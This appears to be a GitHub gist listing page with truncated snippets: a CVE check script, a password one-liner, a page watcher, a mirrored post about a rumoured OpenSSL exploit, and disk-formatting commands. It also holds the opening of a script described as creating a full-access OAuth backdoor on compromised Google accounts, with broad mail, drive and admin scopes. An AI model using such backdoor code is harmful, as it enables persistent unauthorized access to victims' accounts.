David Busby Oneiroi

@Oneiroi
Oneiroi / Dockerfile
Created October 11, 2023 10:30 — forked from xen0bit/Dockerfile
CVE-2023-38545
FROM debian:latest
RUN apt-get update && apt-get install -y \
    git \
    build-essential \
    wget \
    python3
WORKDIR /build
#!/bin/bash
# "---------------------------------------------------"
# " This is a simple script for creating a query "
# " that collects data from the table pg_class "
# " for list of databases "
# "---------------------------------------------------"
if [ "$#" -eq 0 ] ;
then
echo -e "\n\tYou must enter at least one database name as an argument."
@Oneiroi
Oneiroi / CVE-2020-0601-check.ps1
Created January 23, 2020 13:11
PowerShell script to check if the target system has applied any of the KB articles which are thought to contain the fix for CVE-2020-0601
wmic qfe get Caption,Description,HotFixID,InstalledOn |Select-String 'KB45((3(4306|4271|4276|4293|4273))|28760|35550)'
@Oneiroi
Oneiroi / rand_pass.py
Last active August 23, 2018 16:16 — forked from bergantine/gist:1119284
Python Random Password Generator (One Liner). #python #password
python -c "from string import printable; from random import SystemRandom; print(''.join(SystemRandom().choice(printable) for i in range(32)))"
@Oneiroi
Oneiroi / Unsolved crypto challenge since 2015-11-26
Last active December 4, 2017 10:29
This crypto challenge of my own devising has gone unsolved since I created it on 2015-11-26, can you recover the flag?
@Oneiroi
Oneiroi / gsuite_backdoor.py
Created November 2, 2017 13:45 — forked from ustayready/gsuite_backdoor.py
Quickly create a full-access backdoor on Google accounts by creating a Google API project at https://cloud.google.com/console, save the client_secrets.json into the same folder and then run the script below. It will print a URL for you to access with a browser that has the compromised Google account session active so you can authorize the applic…
#!/usr/bin/env python
import os
from oauth2client import client, tools
from oauth2client.file import Storage
SCOPES = 'https://www.googleapis.com/auth/calendar https://mail.google.com/ https://www.googleapis.com/auth/drive https://www.googleapis.com/auth/groups https://www.googleapis.com/auth/admin.directory.user'
def get_credentials():
    credential_dir = os.getcwd()
    client_secret_path = os.path.join(credential_dir, 'client_secrets.json')
@Oneiroi
Oneiroi / 44con_talks_watch.sh
Last active August 9, 2018 09:12
44con talks page watch
#!/bin/bash
OS=`uname`
URL44CON="https://44con.com/44con/44con-2018/44con-2018-schedule/"
#SET this to rickroll or w/e just make sure your speakers are on full volume
YTALERT="https://www.youtube.com/watch?v=H91rPIq2mN4"
if [ "Darwin" == "${OS}" ]; then
    BROWSER="open";
elif [ "Linux" == "${OS}" ]; then
Mirror of https://zerobin.net/?06dae5d45335d2b4#m8FRD5qfMgH1rxjVH4oAjHvOMxJArCGp9UIogpmsnHg= (since removed)
Pulled from https://archive.fo/5Vbc9
Reddit thread https://www.reddit.com/r/netsec/comments/5mw510/discussion_of_a_new_potential_exploit_for_openssl/
Original text now follows:
I'm glad more people are in here now. It gets much, much worse than this.
The post below literally says "if you have the password, you can generate the key and open the file.
while true; do curl -H'User-agent: AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.125 Safari/537.36' -s 'http://www.game.co.uk/webapp/wcs/stores/servlet/HubArticleView?hubId=639265&articleId=639266&catalogId=10201&langId=44&storeId=10151&&cm_mmc=Facebook-_-Digital-_-Fallout4-_-Link#NaN' | grep 'Check back later today' || chromium https://www.youtube.com/watch?v=H91rPIq2mN4; sleep 10; done
#
# ensure CWD contains dirs root and boot
# ensure sd card has not automounted elsewhere
# ensure ArchARM-rpi2.tgz exists in CWD
# ensure partitions configured as per: http://archlinuxarm.org/platforms/armv7/broadcom/raspberry-pi-2
#
mkfs.vfat /dev/mmcblk0p1 && \
mount /dev/mmcblk0p1 ./boot && \
mkfs.ext4 /dev/mmcblk0p2 && \
mount /dev/mmcblk0p2 ./root && \